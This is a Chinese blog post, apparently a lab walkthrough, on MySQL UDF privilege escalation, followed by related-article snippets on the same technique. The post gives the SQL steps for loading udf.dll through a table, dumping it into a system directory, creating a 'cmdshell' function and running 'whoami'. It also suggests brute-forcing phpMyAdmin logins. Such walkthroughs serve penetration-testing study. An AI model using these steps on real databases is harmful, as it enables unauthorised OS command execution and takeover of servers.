Mysql提权(UDF提权)

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量899 收藏 1
点赞数
分类专栏: 提权 渗透测试 文章标签: 渗透测试 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/124229624
版权

数据库提权较为实用,但只有在root权限才可以提权

mysql提权(udf提权)

借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库

拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php

image-20220407154023697

拿到账号密码直接登录

image-20220407154327708

传udf.dll

mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32

如果没有plugin目录,就自己创建一个

首先创建一个表

create table udfeval(shellcode longblob);

image-20220407155249753

将udf写进创建的表中

insert into udfeval values(load_file('dll绝对路径'));

靶场做过处理,不需要传进plugin文件夹

image-20220407160339829

将创建的表里的信息导出

靶场数据库版本为5.0

select shellcode from udfeval into dumpfile 'C://windows/udf.dll';

image-20220407160543638

创建函数

create function cmdshell returns string soname 'udf.dll';

image-20220407160938377

验证函数是否存在

select * from func;

image-20220407161435140

验证权限

select cmdshell('whoami');

image-20220407161558009

如果有phpmyadmin等边缘资产可以尝试弱口令、爆破、漏洞

注意:数据库是root权限,其次有INSERT和DELETE权限,根据版本号传udf

Shadow丶S
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQL UDF 提权
small_cat's home
10-22 1842
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
mysqludf提权复现
Shanfenglan's blog
03-09 1884
文章目录参考文章 参考文章 udf提权原理详解
MYSQL提权
weixin_46626159的博客
03-19 5216
MYSQL udf 提权 一.获取网站权限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF提权 1.UDF提权知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
数据库之Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 1051
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
mysql提权总结
weixin_45605374的博客
12-12 735
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
mysql_udf提权
qq_42383069的博客
03-05 3242
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入权限 连接大马,测试下当前我们的权限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql提权udf
09-20
在网络安全领域,"mysql提权udf"常常指的是利用UDF进行权限提升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL提权通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
MYSQL提权UDF.dll
06-11
MySQL提权UDF.dll是关于数据库安全领域的一个关键知识点,主要涉及到MySQL服务器的权限提升漏洞利用。UDF(User Defined Function)是MySQL提供的一种机制,允许用户自定义函数以扩展其功能。然而,不当的UDF管理或...
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
四、MySQL 提权方式
xlsj雪松的博客
11-18 1748
Mysql提权方式总结
udf提权原理研究-udf开发-linshao
qq_35349673的博客
02-20 3858
mysql通常是使用管理员权限进行配置,因此我们获取一个较低权限时可以通过mysql进行权限提升,本文侧重于制作utf扩展
数据库提权--UDF提权MYSQL
qq_45936617的博客
10-07 372
数据库提权的目的是通过已有的数据库权限获得操作系统的权限。UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数。用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,通过添加命令执行函数可以执行系统命令, 从而进行提权
Mysql-UDF提权
告白的博客
08-14 1794
0x00 提权简介 UDF介绍:User Defined Functions简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。 简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。 我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路
MySQL 利用UDF执行命令
热门推荐
1ame的博客
09-02 1万+
UDF即User-Defined Functions lib_mysqludf_sys 在github的介绍: A UDF library with functions to interact with the operating system. These functions allow you to interact with the execution environment
phpMyadmin提权那些事
dfdhxb995397的博客
06-01 347
i春秋作家:anyedt phpMyadmin提权那些事 引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。 0×00 定义 ​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 ...
mysql udf 提权
完美落地
12-06 849
mysqludf提权方法 01 May 2013 UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。 适用场合: 1、目标主机系...
MySQL udf提权
weixin_45945976的博客
12-02 924
MySQL udf提权 UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。 什么是UDF UDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿 怎么使用UDF 我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的 查看secure_file_priv的指 secure_file_priv是用来限制load

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值